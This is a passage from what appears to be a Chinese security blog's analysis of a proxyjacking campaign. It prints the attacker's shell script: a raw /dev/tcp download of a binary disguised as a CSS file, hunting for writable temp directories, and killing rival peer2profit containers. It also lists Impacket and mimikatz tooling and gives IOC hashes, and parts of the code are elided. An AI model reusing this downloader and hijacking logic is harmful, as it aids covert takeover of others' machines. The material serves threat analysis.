function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0rnHost: ${HOST}rnUser-Agent: curl/6.1.9rnrn" >&3
(while read line; do
[[ "$line" == $'r' ]] && break
done && cat) <&3
exec 3>&-
}
c(){
if ! command -v curl &>/dev/null;then
__curl http://xxx.xxx.xxx.xxx/main/dist/css/csdark.css > curl
if ! md5sum curl|grep -q 2a88b534fa8d58cef93e46c4ab380b23;then
echo "could not get curl"
exit
fi
chmod +x curl
export PATH=$PWD:$PATH
fi
}
d(){
cd /dev/shm && cp /bin/ls . && ./ls &>/dev/null && rm -f ls && return
cd /tmp && cp /bin/ls . && ./ls &>/dev/null && rm -f ls && return
#mkdir -p $HOME/.cache/apt && cd $HOME/.cache/apt && return
echo "no suitable dir"
exit
}
if ps axjf|[...]|grep […] "$PACCT";then
echo "already running"
exit
if docker ps [...] |grep [...] peer2profit [...] p2pclient;then
for con in [...];do
if ! docker [...]|grep [...] "$PACCT";then
[...]
docker stop -t 10 $con
docker stop -s KILL $con
docker stop $con
echo "killed container: $con"
fi
done
fi
cd .. && rm -rf pfp
ls
exchanger.py getST.py ldd2pretty normalizer
secretsdump.py split.py
findDelegation.py getTGT.py lookupsid.py ntfs-read.py
services.py ticketConverter.py
crontab flask GetUserSPNs.py machine_role.py ntlmrelayx.py
smbclient.py ticketer.py
cygdb futurize goldenPac.py mimikatz.py pasteurize
smbexec.py top
cython GetADUsers.py karmaSMB.py mqtt_check.py ping6.py
smbpasswd.py wmiexec.py
cythonize getArch.py keylistattack.py mssqlclient.py ping.py
smbrelayx.py wmipersist.py
Get-GPPPassword.py kintercept.py mssqlinstance.py
rpcmap.py smbserver.py wmiquery.py
GetNPUsers.py ldapdomaindump netview.py ps.old
sniffer.py
getPac.py ldd2bloodhound nmapAnswerMachine.py
__pycache__ samrdump.py sniff.py
IOCs
Hashes
-
6f1ac1e711e662edad32713c135ce29562d636794cf5a21a44bbb34955610f0a - vksp
-
72e7dd199bed6eefa0ae763c399e0d8a56e2b1dfacc089046706226a5f2a
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):代理劫持:最新的网络犯罪副业
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论